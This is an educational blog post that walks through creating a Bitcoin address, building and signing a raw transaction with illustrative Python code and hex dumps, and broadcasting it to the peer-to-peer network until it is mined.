Bitcoins the hard way: Using the raw Bitcoin protocol

All the recent media attention on Bitcoin inspired me to learn how Bitcoin really works, right down to the bytes flowing through the network. Normal people use software[1] that hides what is really going on, but I wanted to get a hands-on understanding of the Bitcoin protocol. My goal was to use the Bitcoin system directly: create a Bitcoin transaction manually, feed it into the system as hex data, and see how it gets processed. This turned out to be considerably harder than I expected, but I learned a lot in the process and hopefully you will find it interesting. This blog post starts with a quick overview of Bitcoin and then jumps into the low-level details: creating a Bitcoin address, making a transaction, signing the transaction, feeding the transaction into the peer-to-peer network, and observing the results.

A quick overview of Bitcoin

I'll start with a quick overview of how Bitcoin works[2], before diving into the details. Bitcoin is a relatively new digital currency[3] that can be transmitted across the Internet. You can buy bitcoins[4] with dollars or other traditional money from sites such as Coinbase or MtGox[5], send bitcoins to other people, buy things with them at some places, and exchange bitcoins back into dollars. To simplify slightly, bitcoins consist of entries in a distributed database that keeps track of the ownership of bitcoins. Unlike a bank, bitcoins are not tied to users or accounts. Instead bitcoins are owned by a Bitcoin address, for example 1KKKK6N21XKo48zWKuQKXdvSsCf95ibHFa.

Bitcoin transactions

A transaction is the mechanism for spending bitcoins. In a transaction, the owner of some bitcoins transfers ownership to a new address. A key innovation of Bitcoin is how transactions are recorded in the distributed database through mining.
Transactions are grouped into blocks and about every 10 minutes a new block of transactions is sent out, becoming part of the transaction log known as the blockchain, which indicates the transaction has been made (more-or-less) official.[6] Bitcoin mining is the process that puts transactions into a block, to make sure everyone has a consistent view of the transaction log. To mine a block, miners must find an extremely rare solution to an (otherwise pointless) cryptographic problem. Finding this solution generates a mined block, which becomes part of the official blockchain. Mining is also the mechanism for new bitcoins to enter the system. When a block is successfully mined, new bitcoins are generated in the block and paid to the miner. This mining bounty is large - currently 25 bitcoins per block (about $19,000). In addition, the miner gets any fees associated with the transactions in the block. Because of this, mining is very competitive, with many people attempting to mine blocks. The difficulty and competitiveness of mining is a key part of Bitcoin security, since it ensures that nobody can flood the system with bad blocks.

The peer-to-peer network

There is no centralized Bitcoin server. Instead, Bitcoin runs on a peer-to-peer network. If you run a Bitcoin client, you become part of that network. The nodes on the network exchange transactions, blocks, and addresses of other peers with each other. When you first connect to the network, your client downloads the blockchain from some random node or nodes. In turn, your client may provide data to other nodes. When you create a Bitcoin transaction, you send it to some peer, who sends it to other peers, and so on, until it reaches the entire network. Miners pick up your transaction, generate a mined block containing your transaction, and send this mined block to peers. Eventually your client will receive the block and your client shows that the transaction was processed.
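The "extremely rare solution" miners search for is a double-SHA-256 hash below a target value. As a rough sketch (not real mining: the header is made up, and the difficulty here is a toy two leading zero bytes rather than the many more real mining requires), the search loop looks like this:

```python
import hashlib

def double_sha256(data: bytes) -> bytes:
    # Bitcoin hashes block headers twice with SHA-256
    return hashlib.sha256(hashlib.sha256(data).digest()).digest()

def toy_mine(header: bytes, zero_bytes: int = 2) -> int:
    # Try successive nonces until the hash starts with the required
    # number of zero bytes. Two bytes keeps this demo fast; real mining
    # needs far more zeros, which is why it takes enormous hash power.
    nonce = 0
    while True:
        attempt = double_sha256(header + nonce.to_bytes(4, "little"))
        if attempt.startswith(b"\x00" * zero_bytes):
            return nonce
        nonce += 1

nonce = toy_mine(b"example block header")
print(nonce)
```

Each extra zero byte multiplies the expected work by 256, which is how the network tunes difficulty.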
Cryptography

Bitcoin uses digital signatures to ensure that only the owner of bitcoins can spend them. The owner of a Bitcoin address has the private key associated with the address. To spend bitcoins, they sign the transaction with this private key, which proves they are the owner. (It's somewhat like signing a physical check to make it valid.) A public key is associated with each Bitcoin address, and anyone can use it to verify the digital signature. Blocks and transactions are identified by a 256-bit cryptographic hash of their contents. This hash value is used in multiple places in the Bitcoin protocol. In addition, finding a special hash is the difficult task in mining a block.

Bitcoins do not really look like this. Photo credit: Antana, CC:by-sa

Diving into the raw Bitcoin protocol

The remainder of this article discusses, step by step, how I used the raw Bitcoin protocol. First I generated a Bitcoin address and keys. Next I made a transaction to move a small amount of bitcoins to this address. Signing this transaction took me a lot of time and trouble. Finally, I fed this transaction into the Bitcoin peer-to-peer network and waited for it to get mined. The following sections describe these steps in detail. It turns out that actually using the Bitcoin protocol is harder than I expected. As you will see, the protocol is a bit of a jumble: it uses big-endian numbers, little-endian numbers, fixed-length numbers, variable-length numbers, custom encodings, DER encoding, and a variety of cryptographic algorithms, seemingly arbitrarily. As a result, there's a lot of annoying manipulation to get data into the right format.[7] The second complication with using the protocol directly is that, being cryptographic, it is very unforgiving.
If you get one byte wrong, the transaction is rejected with no clue as to where the problem is.[8] The final difficulty I encountered is that the process of signing a transaction is much more difficult than necessary, with a lot of details that need to be correct. In particular, the version of a transaction that gets signed is very different from the version that actually gets used.

Bitcoin addresses and keys

My first step was to create a Bitcoin address. Normally you use Bitcoin client software to create an address and the associated keys. However, I wrote some Python code to create the address, showing exactly what goes on behind the scenes. Bitcoin uses a variety of keys and addresses, so the following diagram may help explain them. You start by creating a random 256-bit private key. The private key is needed to sign a transaction and thus transfer (spend) bitcoins. Thus, the private key must be kept secret or else your bitcoins can be stolen. The Elliptic Curve DSA algorithm generates a 512-bit public key from the private key. (Elliptic curve cryptography will be discussed later.) This public key is used to verify the signature on a transaction. Inconveniently, the Bitcoin protocol adds a prefix of 04 to the public key. The public key is not revealed until a transaction is signed, unlike most systems where the public key is made public.

How bitcoin keys and addresses are related

The next step is to generate the Bitcoin address that is shared with others. Since the 512-bit public key is inconveniently large, it is hashed down to 160 bits using the SHA-256 and RIPEMD-160 hash algorithms.[9] The key is then encoded in ASCII using Bitcoin's custom Base58Check encoding.[10] The resulting address, such as 1KKKK6N21XKo48zWKuQKXdvSsCf95ibHFa, is the address people publish in order to receive bitcoins. Note that you cannot determine the public key or the private key from the address.
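To make the Base58Check step concrete, here is a minimal sketch of the encoding: a version byte is prepended, a 4-byte double-SHA-256 checksum is appended, and the result is written in base 58 (the alphabet and checksum rule follow the Bitcoin wiki; the all-zero hash below is just a placeholder for a real public key hash):

```python
import hashlib

B58_ALPHABET = "123456789ABCDEFGHJKLMNPQRSTUVWXYZabcdefghijkmnopqrstuvwxyz"

def double_sha256(data: bytes) -> bytes:
    return hashlib.sha256(hashlib.sha256(data).digest()).digest()

def base58check_encode(version: bytes, payload: bytes) -> str:
    # version byte + payload + 4-byte checksum, written in base 58
    data = version + payload
    data += double_sha256(data)[:4]          # append checksum
    n = int.from_bytes(data, "big")
    out = ""
    while n:
        n, r = divmod(n, 58)
        out = B58_ALPHABET[r] + out
    # each leading zero byte becomes a literal '1' in the output
    pad = len(data) - len(data.lstrip(b"\x00"))
    return "1" * pad + out

# A Bitcoin address is Base58Check of version 0x00 plus the 160-bit
# public key hash (a placeholder all-zero hash here, for illustration).
example_hash160 = bytes(20)
print(base58check_encode(b"\x00", example_hash160))
```

The checksum is what lets wallet software reject a mistyped address instead of sending coins into the void.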
If you lose your private key (for instance by throwing out your hard drive), your bitcoins are lost forever. Finally, the Wallet Import Format key (WIF) is used to add a private key to your client wallet software. This is simply a Base58Check encoding of the private key into ASCII, which is easily reversed to obtain the 256-bit private key. To summarize, there are three types of keys: the private key, the public key, and the hash of the public key, and they are represented externally in ASCII using Base58Check encoding. The private key is the important key, since it is required to access the bitcoins and the other keys can be generated from it. The public key hash is the Bitcoin address you see published. I used the following code snippet[11] to generate a private key in WIF format and an address. The private key is simply a random 256-bit number. The ECDSA crypto library generates the public key from the private key.[12] The Bitcoin address is generated by SHA-256 hashing, RIPEMD-160 hashing, and then Base58 encoding with checksum. Finally, the private key is encoded in Base58Check to generate the WIF encoding used to enter a private key into Bitcoin client software.[1]

Inside a transaction

A transaction is the basic operation in the Bitcoin system. You might expect that a transaction simply moves some bitcoins from one address to another address, but it's more complicated than that. A Bitcoin transaction moves bitcoins between one or more inputs and outputs. Each input is a transaction and address supplying bitcoins. Each output is an address receiving bitcoins, along with the amount of bitcoins going to that address.

A sample Bitcoin transaction. Transaction C spends .008 bitcoins from Transactions A and B.

The diagram above shows a sample transaction "C". In this transaction, .005 BTC are taken from an address in Transaction A, and .003 BTC are taken from an address in Transaction B.
(Note that the arrows are references to the previous outputs, so they are backwards to the flow of bitcoins.) For the outputs, .003 BTC are directed to the first address and .004 BTC are directed to the second address. The leftover .001 BTC goes to the miner of the block as a fee. Note that the .015 BTC in the other output of Transaction A is not spent in this transaction. Each input used must be entirely spent in a transaction. If an address received 100 bitcoins in a transaction and you just want to spend 1 bitcoin, the transaction must spend all 100. The solution is to use a second output for change, which returns the 99 leftover bitcoins back to you. Transactions can also include fees. If there are any bitcoins left over after adding up the inputs and subtracting the outputs, the remainder is a fee paid to the miner. The fee isn't strictly required, but transactions without a fee will be a low priority for miners and may not be processed for days or may be discarded entirely.[13] A typical fee for a transaction is 0.0002 bitcoins (about 20 cents), so fees are low but not trivial.

Manually creating a transaction

For my experiment I used a simple transaction with one input and one output, which is shown below. I started by buying bitcoins from Coinbase and putting 0.00101234 bitcoins into address 1MMMMSUb1piy2ufrSguNUdFmAcvqrQF8M5, which was transaction 81b4c832.... My goal was to create a transaction to transfer these bitcoins to the address I created above, 1KKKK6N21XKo48zWKuQKXdvSsCf95ibHFa, subtracting a fee of 0.0001 bitcoins. Thus, the destination address will receive 0.00091234 bitcoins.

Structure of the example Bitcoin transaction.

Following the specification, the unsigned transaction can be assembled fairly easily, as shown below. There is one input, which uses output 0 (the first output) from transaction 81b4c832.... Note that this transaction hash is inconveniently reversed in the transaction.
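The assembly really is just packing fields into binary. Here is a sketch for the one-input, one-output case; the helper names are my own, the dummy hash stands in for a real transaction id, and the field order follows the table below:

```python
import struct

def varint(n: int) -> bytes:
    # Bitcoin's variable-length integer (values below 0xfd fit in one byte)
    if n < 0xfd:
        return bytes([n])
    if n <= 0xffff:
        return b"\xfd" + struct.pack("<H", n)
    if n <= 0xffffffff:
        return b"\xfe" + struct.pack("<I", n)
    return b"\xff" + struct.pack("<Q", n)

def make_raw_transaction(prev_txid_hex: str, prev_index: int,
                         script_sig: bytes, value_satoshi: int,
                         script_pubkey: bytes) -> bytes:
    tx = struct.pack("<I", 1)                  # version
    tx += varint(1)                            # input count
    tx += bytes.fromhex(prev_txid_hex)[::-1]   # previous hash, reversed
    tx += struct.pack("<I", prev_index)        # previous output index
    tx += varint(len(script_sig)) + script_sig
    tx += b"\xff\xff\xff\xff"                  # sequence
    tx += varint(1)                            # output count
    tx += struct.pack("<Q", value_satoshi)     # value, little-endian
    tx += varint(len(script_pubkey)) + script_pubkey
    tx += struct.pack("<I", 0)                 # block lock time
    return tx

# Dummy 32-byte transaction id and empty scripts, just to show the layout
raw = make_raw_transaction("81" + "00" * 31, 0, b"", 91234, b"")
print(raw.hex())
```

With the value 91234 satoshis, the little-endian value field comes out as 62 64 01 00 00 00 00 00, matching the table below.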
The output amount is 0.00091234 bitcoins (91234 is 0x016462 in hex), which is stored in the value field in little-endian form. The cryptographic parts - scriptSig and scriptPubKey - are more complex and will be discussed later.

version:                             01 00 00 00
input count:                         01
input:
  previous output hash (reversed):   48 4d 40 d4 5b 9e a0 d6 52 fc a8 25 8a b7 ca a4 25 41 eb 52 97 58 57 f9 6f b5 0c d7 32 c8 b4 81
  previous output index:             00 00 00 00
  script length:
  scriptSig:                         script containing signature
  sequence:                          ff ff ff ff
output count:                        01
output:
  value:                             62 64 01 00 00 00 00 00
  script length:
  scriptPubKey:                      script containing destination address
block lock time:                     00 00 00 00

Here's the code I used to generate this unsigned transaction. It's just a matter of packing the data into binary. Signing the transaction is the hard part, as you'll see next.

How Bitcoin transactions are signed

The following diagram gives a simplified view of how transactions are signed and linked together.[14] Consider the middle transaction, transferring bitcoins from address B to address C. The contents of the transaction (including the hash of the previous transaction) are hashed and signed with B's private key. In addition, B's public key is included in the transaction. By performing several steps, anyone can verify that the transaction is authorized by B.
First, B's public key must correspond to B's address in the previous transaction, proving the public key is valid. (The address can easily be derived from the public key, as explained earlier.) Next, B's signature of the transaction can be verified using B's public key in the transaction. These steps ensure that the transaction is valid and authorized by B. One unexpected part of Bitcoin is that B's public key isn't made public until it is used in a transaction. With this system, bitcoins are passed from address to address through a chain of transactions. Each step in the chain can be verified to ensure that bitcoins are being spent validly. Note that transactions can have multiple inputs and outputs in general, so the chain branches out into a tree.

How Bitcoin transactions are chained together.[14]

The Bitcoin scripting language

You might expect that a Bitcoin transaction is signed simply by including the signature in the transaction, but the process is much more complicated. In fact, there is a small program inside each transaction that gets executed to decide if a transaction is valid. This program is written in Script, the stack-based Bitcoin scripting language. Complex redemption conditions can be expressed in this language. For instance, an escrow system can require that two out of three specific users sign the transaction to spend it. Or various types of contracts can be set up.[15] The Script language is surprisingly complex, with about 80 different opcodes. It includes arithmetic, bitwise operations, string operations, conditionals, and stack manipulation. The language also includes the necessary cryptographic operations (SHA-256, RIPEMD-160, etc.) as primitives. In order to ensure that scripts terminate, the language does not contain any looping operations. (As a consequence, it is not Turing-complete.)
In practice, however, only a few types of transactions are supported.[16] In order for a Bitcoin transaction to be valid, the two parts of the redemption script must run successfully. The script in the old transaction is called scriptPubKey and the script in the new transaction is called scriptSig. To verify a transaction, the scriptSig is executed, followed by the scriptPubKey. If the script completes successfully, the transaction is valid and the Bitcoin can be spent. Otherwise, the transaction is invalid. The point of this is that the scriptPubKey in the old transaction defines the conditions for spending the bitcoins. The scriptSig in the new transaction must provide the data to satisfy the conditions. In a standard transaction, the scriptSig pushes the signature (generated from the private key) to the stack, followed by the public key. Next, the scriptPubKey (from the source transaction) is executed to verify the public key and then verify the signature.

As expressed in Script, the scriptSig is:

PUSHDATA signature data and SIGHASH_ALL
PUSHDATA public key data

The scriptPubKey is:

OP_DUP
OP_HASH160
PUSHDATA Bitcoin address (public key hash)
OP_EQUALVERIFY
OP_CHECKSIG

When this code executes, PUSHDATA first pushes the signature to the stack. The next PUSHDATA pushes the public key to the stack. Next, OP_DUP duplicates the public key on the stack. OP_HASH160 computes the 160-bit hash of the public key. PUSHDATA pushes the required Bitcoin address. Then OP_EQUALVERIFY verifies that the top two stack values are equal - that the public key hash from the new transaction matches the address in the old transaction. This proves that the public key is valid. Next, OP_CHECKSIG checks that the signature of the transaction matches the public key and signature on the stack. This proves that the signature is valid.

Signing the transaction

I found signing the transaction to be the hardest part of using Bitcoin manually, with a process that is surprisingly difficult and error-prone.
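The stack execution just described can be sketched with a toy interpreter. This is not real Script: only the standard-transaction opcodes are handled, and the hash and signature checks are injectable stand-ins (a truncated SHA-256 and an always-true check) so the control flow, not the cryptography, is the point:

```python
import hashlib

def run_script(ops, stack, hash160, checksig):
    # Execute script operations against the stack; raise if a VERIFY fails.
    for op in ops:
        if isinstance(op, bytes):                  # PUSHDATA
            stack.append(op)
        elif op == "OP_DUP":
            stack.append(stack[-1])
        elif op == "OP_HASH160":
            stack.append(hash160(stack.pop()))
        elif op == "OP_EQUALVERIFY":
            if stack.pop() != stack.pop():
                raise ValueError("public key hash does not match address")
        elif op == "OP_CHECKSIG":
            pubkey, sig = stack.pop(), stack.pop()
            stack.append(checksig(sig, pubkey))
    return stack

# Stand-ins for the real primitives (NOT Bitcoin's actual hash160/ECDSA):
fake_hash160 = lambda data: hashlib.sha256(data).digest()[:20]
fake_checksig = lambda sig, pubkey: True

pubkey = b"\x04" + b"\x11" * 64                    # 04-prefixed public key
script_sig = [b"signature-bytes", pubkey]
script_pubkey = ["OP_DUP", "OP_HASH160", fake_hash160(pubkey),
                 "OP_EQUALVERIFY", "OP_CHECKSIG"]

stack = run_script(script_sig, [], fake_hash160, fake_checksig)
stack = run_script(script_pubkey, stack, fake_hash160, fake_checksig)
print("spendable" if stack[-1] else "rejected")
```

Swapping in a wrong address for the PUSHDATA in script_pubkey makes OP_EQUALVERIFY fail, which is exactly how a bad spend attempt is rejected.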
The basic idea is to use the ECDSA elliptic curve algorithm and the private key to generate a digital signature of the transaction, but the details are tricky. The signing process has been described as a 19-step process (more info). Click the thumbnail below for a detailed diagram of the process. The biggest complication is that the signature appears in the middle of the transaction, which raises the question of how to sign the transaction before you have the signature. To avoid this problem, the scriptPubKey script is copied from the source transaction into the spending transaction (i.e. the transaction that is being signed) before computing the signature. Then the signature is turned into code in the Script language, creating the scriptSig script that is embedded in the transaction. It appears that using the previous transaction's scriptPubKey during signing is for historical reasons rather than any logical reason.[17] For transactions with multiple inputs, signing is even more complicated since each input requires a separate signature, but I won't go into the details. One step that tripped me up is the hash type. Before signing, the transaction has a hash type constant temporarily appended. For a regular transaction, this is SIGHASH_ALL (0x00000001). After signing, this hash type is removed from the end of the transaction and appended to the scriptSig. Another annoying thing about the Bitcoin protocol is that the signature and public key are both 512-bit elliptic curve values, but they are represented in totally different ways: the signature is encoded with DER encoding but the public key is represented as plain bytes. In addition, both values have an extra byte, but positioned inconsistently: SIGHASH_ALL is put after the signature, and type 04 is put before the public key.
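DER encoding itself is simple for this case: the signature is a SEQUENCE (0x30) containing two length-prefixed INTEGERs (0x02), with a leading zero byte added whenever an integer's high bit is set so it is not read as negative. A sketch with small made-up values in place of real 256-bit signature components:

```python
def der_encode_signature(r: int, s: int) -> bytes:
    # SEQUENCE (0x30) of two INTEGERs (0x02), each length-prefixed
    def der_int(n: int) -> bytes:
        body = n.to_bytes((n.bit_length() + 7) // 8 or 1, "big")
        if body[0] & 0x80:
            body = b"\x00" + body   # keep the integer positive
        return b"\x02" + bytes([len(body)]) + body
    body = der_int(r) + der_int(s)
    return b"\x30" + bytes([len(body)]) + body

print(der_encode_signature(0x2cb2, 0x6c66).hex())  # → 300802022cb202026c66
```

The extra-zero rule is why real signatures are sometimes 71 bytes and sometimes 72: it depends on whether the high bits of r and s happen to be set.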
Debugging the signature was made more difficult because the ECDSA algorithm uses a random number.[18] Thus, the signature is different every time you compute it, so it can't be compared with a known-good signature. With these complications it took me a long time to get the signature to work. Eventually, though, I got all the bugs out of my signing code and successfully signed a transaction. Here's the code snippet I used. The final scriptSig contains the signature along with the public key for the source address (1MMMMSUb1piy2ufrSguNUdFmAcvqrQF8M5). This proves I am allowed to spend these bitcoins, making the transaction valid.

PUSHDATA 47:        47
signature (DER):
  sequence:         30
  length:           44
  integer:          02
    length:         20
    X:              2c b2 65 bf 10 70 7b f4 93 46 c3 51 5d d3 d1 6f c4 54 61 8c 58 ec 0a 0f f4 48 a6 76 c5 4f f7 13
  integer:          02
    length:         20
    Y:              6c 66 24 d7 62 a1 fc ef 46 18 28 4e ad 8f 08 67 8a c0 5b 13 c8 42 35 f1 65 4e 6a d1 68 23 3e 82
  SIGHASH_ALL:      01
PUSHDATA 41:        41
public key:
  type:             04
  X:                14 e3 01 b2 32 8f 17 44 2c 0b 83 10 d7 87 bf 3d 8a 40 4c fb d0 70 4f 13 5b 6a d4 b2 d3 ee 75 13
  Y:                10 f9 81 92 6e 53 a6 e8 c3 9b d7 d3 fe fd 57 6c 54 3c ce 49 3c ba c0 63 88 f2 65 1d 1a ac bf cd

The final scriptPubKey contains the script that must succeed to spend the bitcoins. Note that this script is executed at some arbitrary time in the future when the bitcoins are spent.
It contains the destination address (1KKKK6N21XKo48zWKuQKXdvSsCf95ibHFa) expressed in hex, not Base58Check. The effect is that only the owner of the private key for this address can spend the bitcoins, so that address is in effect the owner.

OP_DUP:             76
OP_HASH160:         a9
PUSHDATA 14:        14
  public key hash:  c8 e9 09 96 c7 c6 08 0e e0 62 84 60 0c 68 4e d9 04 d1 4c 5c
OP_EQUALVERIFY:     88
OP_CHECKSIG:        ac

The final transaction

Once all the necessary methods are in place, the final transaction can be assembled. The final transaction is shown below. This combines the scriptSig and scriptPubKey above with the unsigned transaction described earlier.

version:                             01 00 00 00
input count:                         01
input:
  previous output hash (reversed):   48 4d 40 d4 5b 9e a0 d6 52 fc a8 25 8a b7 ca a4 25 41 eb 52 97 58 57 f9 6f b5 0c d7 32 c8 b4 81
  previous output index:             00 00 00 00
  script length:                     8a
  scriptSig:                         47 30 44 02 20 2c b2 65 bf 10 70 7b f4 93 46 c3 51 5d d3 d1 6f c4 54 61 8c 58 ec 0a 0f f4 48 a6 76 c5 4f f7 13 02 20 6c 66 24 d7 62 a1 fc ef 46 18 28 4e ad 8f 08 67 8a c0 5b 13 c8 42 35 f1 65 4e 6a d1 68 23 3e 82 01 41 04 14 e3 01 b2 32 8f 17 44 2c 0b 83 10 d7 87 bf 3d 8a 40 4c fb d0 70 4f 13 5b 6a d4 b2 d3 ee 75 13 10 f9 81 92 6e 53 a6 e8 c3 9b d7 d3 fe fd 57 6c 54 3c ce 49 3c ba c0 63 88 f2 65 1d 1a ac bf cd
  sequence:                          ff ff ff ff
output count:                        01
output:
  value:                             62 64 01 00 00 00 00 00
  script length:                     19
  scriptPubKey:                      76 a9 14 c8 e9 09 96 c7 c6 08 0e e0 62 84 60 0c 68 4e d9 04 d1 4c 5c 88 ac
block lock time:                     00 00 00 00

A tangent: understanding elliptic curves

Bitcoin uses elliptic curves as part of the signing algorithm. I had heard about elliptic curves before in the context of solving Fermat's Last Theorem, so I was curious about what they are. The mathematics of elliptic curves is interesting, so I'll take a detour and give a quick overview. The name elliptic curve is confusing: elliptic curves are not ellipses, do not look anything like ellipses, and have very little to do with ellipses. An elliptic curve is a curve satisfying the fairly simple equation y^2 = x^3 + ax + b. Bitcoin uses a specific elliptic curve called secp256k1 with the simple equation y^2 = x^3 + 7.[25]

Elliptic curve formula used by Bitcoin.

An important property of elliptic curves is that you can define addition of points on the curve with a simple rule: if you draw a straight line through the curve and it hits three points A, B, and C, then addition is defined by A+B+C=0. Due to the special nature of elliptic curves, addition defined in this way works "normally" and forms a group. With addition defined, you can define integer multiplication: e.g. 4A = A+A+A+A. What makes elliptic curves useful cryptographically is that it's fast to do integer multiplication, but division basically requires brute force. For example, you can compute a product such as 12345678*A = Q really quickly (by computing powers of 2), but if you only know A and Q, solving n*A = Q is hard. In elliptic curve cryptography, the secret number 12345678 would be the private key and the point Q on the curve would be the public key.
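The addition and fast-multiplication rules can be made concrete with toy code. This sketch uses the Bitcoin curve equation y^2 = x^3 + 7, but over a tiny field (p = 11 instead of secp256k1's 256-bit prime) so the numbers can be checked by hand; ec_multiply is the double-and-add trick (the "computing powers of 2" mentioned above):

```python
# Toy elliptic-curve arithmetic over F_11 on the curve y^2 = x^3 + 7.
P_MOD = 11
INF = None  # the point at infinity, the group identity

def ec_add(p1, p2):
    if p1 is INF:
        return p2
    if p2 is INF:
        return p1
    (x1, y1), (x2, y2) = p1, p2
    if x1 == x2 and (y1 + y2) % P_MOD == 0:
        return INF                              # P + (-P) = identity
    if p1 == p2:
        # tangent-line slope: (3x^2) / (2y)     (the curve's a term is 0)
        m = 3 * x1 * x1 * pow(2 * y1, -1, P_MOD) % P_MOD
    else:
        m = (y2 - y1) * pow(x2 - x1, -1, P_MOD) % P_MOD
    x3 = (m * m - x1 - x2) % P_MOD
    return (x3, (m * (x1 - x3) - y1) % P_MOD)

def ec_multiply(k, point):
    # Double-and-add: k*point in O(log k) additions - the fast direction.
    # Recovering k from the result is the hard "division" direction.
    result = INF
    while k:
        if k & 1:
            result = ec_add(result, point)
        point = ec_add(point, point)
        k >>= 1
    return result

G = (2, 2)  # a point on the curve: 2^2 = 4 and 2^3 + 7 = 15 = 4 (mod 11)
print(ec_multiply(5, G))
```

Replace P_MOD, G, and the range of k with secp256k1's parameters and a 256-bit k and this same structure becomes real (if slow) Bitcoin key arithmetic.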
In cryptography, instead of using real-valued points on the curve, the coordinates are integers modulo a prime.[19] One of the surprising properties of elliptic curves is that the math works pretty much the same whether you use real numbers or modular arithmetic. Because of this, Bitcoin's elliptic curve doesn't look like the picture above, but is a random-looking mess of 256-bit points (imagine a big gray square of points). The Elliptic Curve Digital Signature Algorithm (ECDSA) takes a message hash, and then does some straightforward elliptic curve arithmetic using the message, the private key, and a random number[18] to generate a new point on the curve that gives a signature. Anyone who has the public key, the message, and the signature can do some simple elliptic curve arithmetic to verify that the signature is valid. Thus, only the person with the private key can sign a message, but anyone with the public key can verify the message. For more on elliptic curves, see the references[20].

Sending my transaction into the peer-to-peer network

Leaving elliptic curves behind, at this point I've created a transaction and signed it. The next step is to send it into the peer-to-peer network, where it will be picked up by miners and incorporated into a block.

How to find peers

The first step in using the peer-to-peer network is finding a peer. The list of peers changes every few seconds, whenever someone runs a client. Once a node is connected to a peer node, they share new peers by exchanging addr messages whenever a new peer is discovered. Thus, new peers rapidly spread through the system. There's a chicken-and-egg problem, though, of how to find the first peer. Bitcoin clients solve this problem with several methods. Several reliable peers are registered in DNS under the name bitseed.xf2.org. By doing an nslookup, a client gets the IP addresses of these peers, and hopefully one of them will work. If that doesn't work, a seed list of peers is hardcoded into the client.
nslookup can be used to find Bitcoin peers.[26]

Peers enter and leave the network when ordinary users start and stop Bitcoin clients, so there is a lot of turnover in clients. The clients I use are unlikely to be operational right now, so you'll need to find new peers if you want to do experiments. You may need to try a bunch to find one that works.

Talking to peers

Once I had the address of a working peer, the next step was to send my transaction into the peer-to-peer network.[8] Using the peer-to-peer protocol is pretty straightforward. I opened a TCP connection to an arbitrary peer on port 8333, started sending messages, and received messages in turn. The Bitcoin peer-to-peer protocol is pretty forgiving; peers would keep communicating even if I totally messed up requests. The protocol consists of about 24 different message types. Each message is a fairly straightforward binary blob containing an ASCII command name and a binary payload appropriate to the command. The protocol is well-documented on the Bitcoin wiki. The first step when connecting to a peer is to establish the connection by exchanging version messages. First I send a version message with my protocol version number[21], address, and a few other things. The peer sends its version message back. After this, nodes are supposed to acknowledge the version message with a verack message. (As I mentioned, the protocol is forgiving - everything works fine even if I skip the verack.) Generating the version message isn't totally trivial since it has a bunch of fields, but it can be created with a few lines of Python. makeMessage below builds an arbitrary peer-to-peer message from the magic number, command name, and payload. getVersionMessage creates the payload for a version message by packing together the various fields.

Sending a transaction: tx

I sent the transaction into the peer-to-peer network with the stripped-down Python script below.
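A makeMessage helper of that kind can be sketched as follows (the constant and function names here are my own; the framing - magic number, 12-byte NUL-padded command, payload length, 4-byte double-SHA-256 checksum, payload - follows the format documented on the Bitcoin wiki):

```python
import hashlib
import struct

def make_message(magic: int, command: str, payload: bytes) -> bytes:
    # Frame a Bitcoin peer-to-peer message for sending over TCP.
    checksum = hashlib.sha256(hashlib.sha256(payload).digest()).digest()[:4]
    return (struct.pack("<I", magic)                    # network magic
            + command.encode("ascii").ljust(12, b"\x00")  # command name
            + struct.pack("<I", len(payload))           # payload length
            + checksum                                  # payload checksum
            + payload)

MAGIC_MAIN = 0xD9B4BEF9  # main-network magic number
# A truncated placeholder payload, just to show the framing
msg = make_message(MAGIC_MAIN, "tx", b"\x01\x00\x00\x00")
print(msg.hex())
```

The magic number is why the hex dumps of these messages always begin f9 be b4 d9; it lets a peer resynchronize if it gets confused mid-stream.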
The script sends a version message, receives (and ignores) the peer's version and verack messages, and then sends the transaction as a tx message. The hex string is the transaction that I created earlier. The following screenshot shows how sending my transaction appears in the Wireshark network analysis program[22]. I wrote Python scripts to process Bitcoin network traffic, but to keep things simple I'll just use Wireshark here. The "tx" message type is visible in the ASCII dump, followed on the next line by the start of my transaction (01 00 ...).

A transaction uploaded to Bitcoin, as seen in Wireshark.

To monitor the progress of my transaction, I had a socket opened to another random peer. Five seconds after sending my transaction, the other peer sent me a tx message with the hash of the transaction I just sent. Thus, it took just a few seconds for my transaction to get passed around the peer-to-peer network, or at least part of it.

Victory: my transaction is mined

After sending my transaction into the peer-to-peer network, I needed to wait for it to be mined before I could claim victory. Ten minutes later my script received an inv message with a new block (see Wireshark trace below). Checking this block showed that it contained my transaction, proving my transaction worked. I could also verify the success of this transaction by looking in my Bitcoin wallet and by checking online. Thus, after a lot of effort, I had successfully created a transaction manually and had it accepted by the system. (Needless to say, my first few transaction attempts weren't successful - my faulty transactions vanished into the network, never to be seen again.[8])

A new block in Bitcoin, as seen in Wireshark.

My transaction was mined by the large GHash.IO mining pool, into block #279068 with hash 0000000000000001a27b1d6eb8c405410398ece796e742da3b3e35363c2219ee. (The hash is reversed in the inv message above: ee19...)
Note that the hash starts with a large number of zeros - finding such a literally one-in-a-quintillion value is what makes mining so difficult. This particular block contains 462 transactions, of which my transaction is just one. For mining this block, the miners received the reward of 25 bitcoins and total fees of 0.104 bitcoins, approximately $19,000 and $80 respectively. I paid a fee of 0.0001 bitcoins, approximately 8 cents or 10% of my transaction. The mining process is very interesting, but I'll leave that for a future article.

Bitcoin mining normally uses special-purpose ASIC hardware, designed to compute hashes at high speed. Photo credit: Gastev, CC:by

Conclusion

Using the raw Bitcoin protocol turned out to be harder than I expected, but I learned a lot about bitcoins along the way, and I hope you did too. My full code is available on GitHub.[23] My code is purely for demonstration - if you actually want to use bitcoins through Python, use a real library[24] rather than my code.

Notes and references

[1] The original Bitcoin client is Bitcoin-qt. In case you're wondering why qt, the client uses the common Qt UI framework. Alternatively you can use wallet software that doesn't participate in the peer-to-peer network, such as Armory or MultiBit. Or you can use an online wallet such as Blockchain.info.

[2] A couple of good articles on Bitcoin are How it works and the very thorough How the Bitcoin protocol actually works.

[3] The original Bitcoin paper is Bitcoin: A Peer-to-Peer Electronic Cash System, written by the pseudonymous Satoshi Nakamoto in 2008. The true identity of Satoshi Nakamoto is unknown, although there are many theories.

[4] You may have noticed that sometimes Bitcoin is capitalized and sometimes not. It's not a problem with my shift key - the "official" style is to capitalize Bitcoin when referring to the system, and lower-case bitcoins when referring to the currency units.
[5] In case you're wondering how the popular MtGox Bitcoin exchange got its name, it was originally a trading card exchange called "Magic: The Gathering Online Exchange" and later took the acronym as its name.

[6] For more information on what data is in the blockchain, see the very helpful article Bitcoin, litecoin, dogecoin: How to explore the block chain.

[7] I'm not the only one who finds the Bitcoin transaction format inconvenient. For a rant on how messed up it is, see Criticisms of Bitcoin's raw txn format.

